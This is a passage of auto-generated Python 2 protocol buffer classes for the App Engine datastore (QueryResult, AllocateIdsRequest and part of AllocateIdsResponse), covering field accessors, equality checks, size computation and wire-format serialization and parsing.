    if self.has_index_only_:
      self.has_index_only_ = 0
      self.index_only_ = 0

  def has_index_only(self): return self.has_index_only_

  def small_ops(self): return self.small_ops_

  def set_small_ops(self, x):
    self.has_small_ops_ = 1
    self.small_ops_ = x

  def clear_small_ops(self):
    if self.has_small_ops_:
      self.has_small_ops_ = 0
      self.small_ops_ = 0

  def has_small_ops(self): return self.has_small_ops_

  def compiled_query(self):
    if self.compiled_query_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.compiled_query_ is None: self.compiled_query_ = CompiledQuery()
      finally:
        self.lazy_init_lock_.release()
    return self.compiled_query_

  def mutable_compiled_query(self): self.has_compiled_query_ = 1; return self.compiled_query()

  def clear_compiled_query(self):

    if self.has_compiled_query_:
      self.has_compiled_query_ = 0;
      if self.compiled_query_ is not None: self.compiled_query_.Clear()

  def has_compiled_query(self): return self.has_compiled_query_

  def compiled_cursor(self):
    if self.compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.compiled_cursor_ is None: self.compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.compiled_cursor_

  def mutable_compiled_cursor(self): self.has_compiled_cursor_ = 1; return self.compiled_cursor()

  def clear_compiled_cursor(self):

    if self.has_compiled_cursor_:
      self.has_compiled_cursor_ = 0;
      if self.compiled_cursor_ is not None: self.compiled_cursor_.Clear()

  def has_compiled_cursor(self): return self.has_compiled_cursor_

  def index_size(self): return len(self.index_)
  def index_list(self): return self.index_

  def index(self, i):
    return self.index_[i]

  def mutable_index(self, i):
    return self.index_[i]

  def add_index(self):
    x = CompositeIndex()
    self.index_.append(x)
    return x

  def clear_index(self):
    self.index_ = []
  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def set_version(self, i, x):
    self.version_[i] = x

  def add_version(self, x):
    self.version_.append(x)

  def clear_version(self):
    self.version_ = []

  def result_compiled_cursor_size(self): return len(self.result_compiled_cursor_)
  def result_compiled_cursor_list(self): return self.result_compiled_cursor_

  def result_compiled_cursor(self, i):
    return self.result_compiled_cursor_[i]

  def mutable_result_compiled_cursor(self, i):
    return self.result_compiled_cursor_[i]

  def add_result_compiled_cursor(self):
    x = CompiledCursor()
    self.result_compiled_cursor_.append(x)
    return x

  def clear_result_compiled_cursor(self):
    self.result_compiled_cursor_ = []
  def skipped_results_compiled_cursor(self):
    if self.skipped_results_compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.skipped_results_compiled_cursor_ is None: self.skipped_results_compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.skipped_results_compiled_cursor_

  def mutable_skipped_results_compiled_cursor(self): self.has_skipped_results_compiled_cursor_ = 1; return self.skipped_results_compiled_cursor()

  def clear_skipped_results_compiled_cursor(self):

    if self.has_skipped_results_compiled_cursor_:
      self.has_skipped_results_compiled_cursor_ = 0;
      if self.skipped_results_compiled_cursor_ is not None: self.skipped_results_compiled_cursor_.Clear()

  def has_skipped_results_compiled_cursor(self): return self.has_skipped_results_compiled_cursor_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_cursor()): self.mutable_cursor().MergeFrom(x.cursor())
    for i in xrange(x.result_size()): self.add_result().CopyFrom(x.result(i))
    if (x.has_skipped_results()): self.set_skipped_results(x.skipped_results())
    if (x.has_more_results()): self.set_more_results(x.more_results())
    if (x.has_keys_only()): self.set_keys_only(x.keys_only())
    if (x.has_index_only()): self.set_index_only(x.index_only())
    if (x.has_small_ops()): self.set_small_ops(x.small_ops())
    if (x.has_compiled_query()): self.mutable_compiled_query().MergeFrom(x.compiled_query())
    if (x.has_compiled_cursor()): self.mutable_compiled_cursor().MergeFrom(x.compiled_cursor())
    for i in xrange(x.index_size()): self.add_index().CopyFrom(x.index(i))
    for i in xrange(x.version_size()): self.add_version(x.version(i))
    for i in xrange(x.result_compiled_cursor_size()): self.add_result_compiled_cursor().CopyFrom(x.result_compiled_cursor(i))
    if (x.has_skipped_results_compiled_cursor()): self.mutable_skipped_results_compiled_cursor().MergeFrom(x.skipped_results_compiled_cursor())

  def Equals(self, x):
    if x is self: return 1
    if self.has_cursor_ != x.has_cursor_: return 0
    if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
    if len(self.result_) != len(x.result_): return 0
    for e1, e2 in zip(self.result_, x.result_):
      if e1 != e2: return 0
    if self.has_skipped_results_ != x.has_skipped_results_: return 0
    if self.has_skipped_results_ and self.skipped_results_ != x.skipped_results_: return 0
    if self.has_more_results_ != x.has_more_results_: return 0
    if self.has_more_results_ and self.more_results_ != x.more_results_: return 0
    if self.has_keys_only_ != x.has_keys_only_: return 0
    if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
    if self.has_index_only_ != x.has_index_only_: return 0
    if self.has_index_only_ and self.index_only_ != x.index_only_: return 0
    if self.has_small_ops_ != x.has_small_ops_: return 0
    if self.has_small_ops_ and self.small_ops_ != x.small_ops_: return 0
    if self.has_compiled_query_ != x.has_compiled_query_: return 0
    if self.has_compiled_query_ and self.compiled_query_ != x.compiled_query_: return 0
    if self.has_compiled_cursor_ != x.has_compiled_cursor_: return 0
    if self.has_compiled_cursor_ and self.compiled_cursor_ != x.compiled_cursor_: return 0
    if len(self.index_) != len(x.index_): return 0
    for e1, e2 in zip(self.index_, x.index_):
      if e1 != e2: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    if len(self.result_compiled_cursor_) != len(x.result_compiled_cursor_): return 0
    for e1, e2 in zip(self.result_compiled_cursor_, x.result_compiled_cursor_):
      if e1 != e2: return 0
    if self.has_skipped_results_compiled_cursor_ != x.has_skipped_results_compiled_cursor_: return 0
    if self.has_skipped_results_compiled_cursor_ and self.skipped_results_compiled_cursor_ != x.skipped_results_compiled_cursor_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_cursor_ and not self.cursor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.result_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (not self.has_more_results_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: more_results not set.')
    if (self.has_compiled_query_ and not self.compiled_query_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_compiled_cursor_ and not self.compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.result_compiled_cursor_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_skipped_results_compiled_cursor_ and not self.skipped_results_compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_cursor_): n += 1 + self.lengthString(self.cursor_.ByteSize())
    n += 1 * len(self.result_)
    for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSize())
    if (self.has_skipped_results_): n += 1 + self.lengthVarInt64(self.skipped_results_)
    if (self.has_keys_only_): n += 2
    if (self.has_index_only_): n += 2
    if (self.has_small_ops_): n += 2
    if (self.has_compiled_query_): n += 1 + self.lengthString(self.compiled_query_.ByteSize())
    if (self.has_compiled_cursor_): n += 1 + self.lengthString(self.compiled_cursor_.ByteSize())
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSize())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    n += 1 * len(self.result_compiled_cursor_)
    for i in xrange(len(self.result_compiled_cursor_)): n += self.lengthString(self.result_compiled_cursor_[i].ByteSize())
    if (self.has_skipped_results_compiled_cursor_): n += 1 + self.lengthString(self.skipped_results_compiled_cursor_.ByteSize())
    return n + 2

  def ByteSizePartial(self):
    n = 0
    if (self.has_cursor_): n += 1 + self.lengthString(self.cursor_.ByteSizePartial())
    n += 1 * len(self.result_)
    for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSizePartial())
    if (self.has_skipped_results_): n += 1 + self.lengthVarInt64(self.skipped_results_)
    if (self.has_more_results_):
      n += 2
    if (self.has_keys_only_): n += 2
    if (self.has_index_only_): n += 2
    if (self.has_small_ops_): n += 2
    if (self.has_compiled_query_): n += 1 + self.lengthString(self.compiled_query_.ByteSizePartial())
    if (self.has_compiled_cursor_): n += 1 + self.lengthString(self.compiled_cursor_.ByteSizePartial())
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSizePartial())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    n += 1 * len(self.result_compiled_cursor_)
    for i in xrange(len(self.result_compiled_cursor_)): n += self.lengthString(self.result_compiled_cursor_[i].ByteSizePartial())
    if (self.has_skipped_results_compiled_cursor_): n += 1 + self.lengthString(self.skipped_results_compiled_cursor_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_cursor()
    self.clear_result()
    self.clear_skipped_results()
    self.clear_more_results()
    self.clear_keys_only()
    self.clear_index_only()
    self.clear_small_ops()
    self.clear_compiled_query()
    self.clear_compiled_cursor()
    self.clear_index()
    self.clear_version()
    self.clear_result_compiled_cursor()
    self.clear_skipped_results_compiled_cursor()

  def OutputUnchecked(self, out):
    if (self.has_cursor_):
      out.putVarInt32(10)
      out.putVarInt32(self.cursor_.ByteSize())
      self.cursor_.OutputUnchecked(out)
    for i in xrange(len(self.result_)):
      out.putVarInt32(18)
      out.putVarInt32(self.result_[i].ByteSize())
      self.result_[i].OutputUnchecked(out)
    out.putVarInt32(24)
    out.putBoolean(self.more_results_)
    if (self.has_keys_only_):
      out.putVarInt32(32)
      out.putBoolean(self.keys_only_)
    if (self.has_compiled_query_):
      out.putVarInt32(42)
      out.putVarInt32(self.compiled_query_.ByteSize())
      self.compiled_query_.OutputUnchecked(out)
    if (self.has_compiled_cursor_):
      out.putVarInt32(50)
      out.putVarInt32(self.compiled_cursor_.ByteSize())
      self.compiled_cursor_.OutputUnchecked(out)
    if (self.has_skipped_results_):
      out.putVarInt32(56)
      out.putVarInt32(self.skipped_results_)
    for i in xrange(len(self.index_)):
      out.putVarInt32(66)
      out.putVarInt32(self.index_[i].ByteSize())
      self.index_[i].OutputUnchecked(out)
    if (self.has_index_only_):
      out.putVarInt32(72)
      out.putBoolean(self.index_only_)
    if (self.has_small_ops_):
      out.putVarInt32(80)
      out.putBoolean(self.small_ops_)
    for i in xrange(len(self.version_)):
      out.putVarInt32(88)
      out.putVarInt64(self.version_[i])
    for i in xrange(len(self.result_compiled_cursor_)):
      out.putVarInt32(98)
      out.putVarInt32(self.result_compiled_cursor_[i].ByteSize())
      self.result_compiled_cursor_[i].OutputUnchecked(out)
    if (self.has_skipped_results_compiled_cursor_):
      out.putVarInt32(106)
      out.putVarInt32(self.skipped_results_compiled_cursor_.ByteSize())
      self.skipped_results_compiled_cursor_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_cursor_):
      out.putVarInt32(10)
      out.putVarInt32(self.cursor_.ByteSizePartial())
      self.cursor_.OutputPartial(out)
    for i in xrange(len(self.result_)):
      out.putVarInt32(18)
      out.putVarInt32(self.result_[i].ByteSizePartial())
      self.result_[i].OutputPartial(out)
    if (self.has_more_results_):
      out.putVarInt32(24)
      out.putBoolean(self.more_results_)
    if (self.has_keys_only_):
      out.putVarInt32(32)
      out.putBoolean(self.keys_only_)
    if (self.has_compiled_query_):
      out.putVarInt32(42)
      out.putVarInt32(self.compiled_query_.ByteSizePartial())
      self.compiled_query_.OutputPartial(out)
    if (self.has_compiled_cursor_):
      out.putVarInt32(50)
      out.putVarInt32(self.compiled_cursor_.ByteSizePartial())
      self.compiled_cursor_.OutputPartial(out)
    if (self.has_skipped_results_):
      out.putVarInt32(56)
      out.putVarInt32(self.skipped_results_)
    for i in xrange(len(self.index_)):
      out.putVarInt32(66)
      out.putVarInt32(self.index_[i].ByteSizePartial())
      self.index_[i].OutputPartial(out)
    if (self.has_index_only_):
      out.putVarInt32(72)
      out.putBoolean(self.index_only_)
    if (self.has_small_ops_):
      out.putVarInt32(80)
      out.putBoolean(self.small_ops_)
    for i in xrange(len(self.version_)):
      out.putVarInt32(88)
      out.putVarInt64(self.version_[i])
    for i in xrange(len(self.result_compiled_cursor_)):
      out.putVarInt32(98)
      out.putVarInt32(self.result_compiled_cursor_[i].ByteSizePartial())
      self.result_compiled_cursor_[i].OutputPartial(out)
    if (self.has_skipped_results_compiled_cursor_):
      out.putVarInt32(106)
      out.putVarInt32(self.skipped_results_compiled_cursor_.ByteSizePartial())
      self.skipped_results_compiled_cursor_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cursor().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_result().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_more_results(d.getBoolean())
        continue
      if tt == 32:
        self.set_keys_only(d.getBoolean())
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_compiled_query().TryMerge(tmp)
        continue
      if tt == 50:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 56:
        self.set_skipped_results(d.getVarInt32())
        continue
      if tt == 66:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_index().TryMerge(tmp)
        continue
      if tt == 72:
        self.set_index_only(d.getBoolean())
        continue
      if tt == 80:
        self.set_small_ops(d.getBoolean())
        continue
      if tt == 88:
        self.add_version(d.getVarInt64())
        continue
      if tt == 98:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_result_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 106:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_skipped_results_compiled_cursor().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_cursor_:
      res+=prefix+"cursor <\n"
      res+=self.cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.result_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("result%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_skipped_results_: res+=prefix+("skipped_results: %s\n" % self.DebugFormatInt32(self.skipped_results_))
    if self.has_more_results_: res+=prefix+("more_results: %s\n" % self.DebugFormatBool(self.more_results_))
    if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
    if self.has_index_only_: res+=prefix+("index_only: %s\n" % self.DebugFormatBool(self.index_only_))
    if self.has_small_ops_: res+=prefix+("small_ops: %s\n" % self.DebugFormatBool(self.small_ops_))
    if self.has_compiled_query_:
      res+=prefix+"compiled_query <\n"
      res+=self.compiled_query_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_compiled_cursor_:
      res+=prefix+"compiled_cursor <\n"
      res+=self.compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatInt64(e)))
      cnt+=1
    cnt=0
    for e in self.result_compiled_cursor_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("result_compiled_cursor%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_skipped_results_compiled_cursor_:
      res+=prefix+"skipped_results_compiled_cursor <\n"
      res+=self.skipped_results_compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kcursor = 1
  kresult = 2
  kskipped_results = 7
  kmore_results = 3
  kkeys_only = 4
  kindex_only = 9
  ksmall_ops = 10
  kcompiled_query = 5
  kcompiled_cursor = 6
  kindex = 8
  kversion = 11
  kresult_compiled_cursor = 12
  kskipped_results_compiled_cursor = 13

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cursor",
    2: "result",
    3: "more_results",
    4: "keys_only",
    5: "compiled_query",
    6: "compiled_cursor",
    7: "skipped_results",
    8: "index",
    9: "index_only",
    10: "small_ops",
    11: "version",
    12: "result_compiled_cursor",
    13: "skipped_results_compiled_cursor",
  }, 13)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.STRING,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.STRING,
    9: ProtocolBuffer.Encoder.NUMERIC,
    10: ProtocolBuffer.Encoder.NUMERIC,
    11: ProtocolBuffer.Encoder.NUMERIC,
    12: ProtocolBuffer.Encoder.STRING,
    13: ProtocolBuffer.Encoder.STRING,
  }, 13, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.QueryResult'
class AllocateIdsRequest(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_model_key_ = 0
  model_key_ = None
  has_size_ = 0
  size_ = 0
  has_max_ = 0
  max_ = 0
  has_trusted_ = 0
  trusted_ = 0

  def __init__(self, contents=None):
    self.reserve_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def model_key(self):
    if self.model_key_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.model_key_ is None: self.model_key_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.model_key_

  def mutable_model_key(self): self.has_model_key_ = 1; return self.model_key()

  def clear_model_key(self):

    if self.has_model_key_:
      self.has_model_key_ = 0;
      if self.model_key_ is not None: self.model_key_.Clear()

  def has_model_key(self): return self.has_model_key_

  def size(self): return self.size_

  def set_size(self, x):
    self.has_size_ = 1
    self.size_ = x

  def clear_size(self):
    if self.has_size_:
      self.has_size_ = 0
      self.size_ = 0

  def has_size(self): return self.has_size_

  def max(self): return self.max_

  def set_max(self, x):
    self.has_max_ = 1
    self.max_ = x

  def clear_max(self):
    if self.has_max_:
      self.has_max_ = 0
      self.max_ = 0

  def has_max(self): return self.has_max_

  def reserve_size(self): return len(self.reserve_)
  def reserve_list(self): return self.reserve_

  def reserve(self, i):
    return self.reserve_[i]

  def mutable_reserve(self, i):
    return self.reserve_[i]

  def add_reserve(self):
    x = Reference()
    self.reserve_.append(x)
    return x

  def clear_reserve(self):
    self.reserve_ = []
  def trusted(self): return self.trusted_

  def set_trusted(self, x):
    self.has_trusted_ = 1
    self.trusted_ = x

  def clear_trusted(self):
    if self.has_trusted_:
      self.has_trusted_ = 0
      self.trusted_ = 0

  def has_trusted(self): return self.has_trusted_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_model_key()): self.mutable_model_key().MergeFrom(x.model_key())
    if (x.has_size()): self.set_size(x.size())
    if (x.has_max()): self.set_max(x.max())
    for i in xrange(x.reserve_size()): self.add_reserve().CopyFrom(x.reserve(i))
    if (x.has_trusted()): self.set_trusted(x.trusted())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_model_key_ != x.has_model_key_: return 0
    if self.has_model_key_ and self.model_key_ != x.model_key_: return 0
    if self.has_size_ != x.has_size_: return 0
    if self.has_size_ and self.size_ != x.size_: return 0
    if self.has_max_ != x.has_max_: return 0
    if self.has_max_ and self.max_ != x.max_: return 0
    if len(self.reserve_) != len(x.reserve_): return 0
    for e1, e2 in zip(self.reserve_, x.reserve_):
      if e1 != e2: return 0
    if self.has_trusted_ != x.has_trusted_: return 0
    if self.has_trusted_ and self.trusted_ != x.trusted_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_model_key_ and not self.model_key_.IsInitialized(debug_strs)): initialized = 0
    for p in self.reserve_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    if (self.has_model_key_): n += 1 + self.lengthString(self.model_key_.ByteSize())
    if (self.has_size_): n += 1 + self.lengthVarInt64(self.size_)
    if (self.has_max_): n += 1 + self.lengthVarInt64(self.max_)
    n += 1 * len(self.reserve_)
    for i in xrange(len(self.reserve_)): n += self.lengthString(self.reserve_[i].ByteSize())
    if (self.has_trusted_): n += 2
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_model_key_): n += 1 + self.lengthString(self.model_key_.ByteSizePartial())
    if (self.has_size_): n += 1 + self.lengthVarInt64(self.size_)
    if (self.has_max_): n += 1 + self.lengthVarInt64(self.max_)
    n += 1 * len(self.reserve_)
    for i in xrange(len(self.reserve_)): n += self.lengthString(self.reserve_[i].ByteSizePartial())
    if (self.has_trusted_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_model_key()
    self.clear_size()
    self.clear_max()
    self.clear_reserve()
    self.clear_trusted()

  def OutputUnchecked(self, out):
    if (self.has_model_key_):
      out.putVarInt32(10)
      out.putVarInt32(self.model_key_.ByteSize())
      self.model_key_.OutputUnchecked(out)
    if (self.has_size_):
      out.putVarInt32(16)
      out.putVarInt64(self.size_)
    if (self.has_max_):
      out.putVarInt32(24)
      out.putVarInt64(self.max_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)
    for i in xrange(len(self.reserve_)):
      out.putVarInt32(42)
      out.putVarInt32(self.reserve_[i].ByteSize())
      self.reserve_[i].OutputUnchecked(out)
    if (self.has_trusted_):
      out.putVarInt32(48)
      out.putBoolean(self.trusted_)

  def OutputPartial(self, out):
    if (self.has_model_key_):
      out.putVarInt32(10)
      out.putVarInt32(self.model_key_.ByteSizePartial())
      self.model_key_.OutputPartial(out)
    if (self.has_size_):
      out.putVarInt32(16)
      out.putVarInt64(self.size_)
    if (self.has_max_):
      out.putVarInt32(24)
      out.putVarInt64(self.max_)
    if (self.has_header_):
      out.putVarInt32(34)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)
    for i in xrange(len(self.reserve_)):
      out.putVarInt32(42)
      out.putVarInt32(self.reserve_[i].ByteSizePartial())
      self.reserve_[i].OutputPartial(out)
    if (self.has_trusted_):
      out.putVarInt32(48)
      out.putBoolean(self.trusted_)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_model_key().TryMerge(tmp)
        continue
      if tt == 16:
        self.set_size(d.getVarInt64())
        continue
      if tt == 24:
        self.set_max(d.getVarInt64())
        continue
      if tt == 34:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_reserve().TryMerge(tmp)
        continue
      if tt == 48:
        self.set_trusted(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_model_key_:
      res+=prefix+"model_key <\n"
      res+=self.model_key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_size_: res+=prefix+("size: %s\n" % self.DebugFormatInt64(self.size_))
    if self.has_max_: res+=prefix+("max: %s\n" % self.DebugFormatInt64(self.max_))
    cnt=0
    for e in self.reserve_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("reserve%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_trusted_: res+=prefix+("trusted: %s\n" % self.DebugFormatBool(self.trusted_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 4
  kmodel_key = 1
  ksize = 2
  kmax = 3
  kreserve = 5
  ktrusted = 6

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "model_key",
    2: "size",
    3: "max",
    4: "header",
    5: "reserve",
    6: "trusted",
  }, 6)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.NUMERIC,
  }, 6, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.AllocateIdsRequest'
class AllocateIdsResponse(ProtocolBuffer.ProtocolMessage):
  has_start_ = 0
  start_ = 0
  has_end_ = 0
  end_ = 0
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def start(self): return self.start_

  def set_start(self, x):
    self.has_start_ = 1
    self.start_ = x

  def clear_start(self):
    if self.has_start_:
      self.has_start_ = 0
      self.start_ = 0

  def has_start(self): return self.has_start_

  def end(self): return self.end_

  def set_end(self, x):
    self.has_end_ = 1
    self.end_ = x

  def clear_end(self):
    if self.has_end_:
      self.has_end_ = 0
      self.end_ = 0

  def has_end(self): return self.has_end_

  def cost(self):
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):

    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_start()): self.set_start(x.start())
    if (x.has_end()): self.set_end(x.end())
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())

  def Equals(self, x):
    if x is self: return 1
    if self.has_start_ != x.has_start_: return 0
    if self.has_start_ and self.start_ != x.start_: return 0
    if self.has_end_ != x.has_end_: return 0
    if self.has_end_ and self.end_ != x.end_: return 0
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_start_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: start not set.')
    if (not self.has_end_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: end not set.')
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    n += self.lengthVarInt64(self.start_)
    n += self.lengthVarInt64(self.end_)
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    return n + 2

  def ByteSizePartial(self):
    n = 0
    if (self.has_start_):
      n += 1
      n += self.lengthVarInt64(self.start_)
    if (self.has_end_):
      n += 1
      n += self.lengthVarInt64(self.end_)
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_start()
    self.clear_end()
    self.clear_cost()

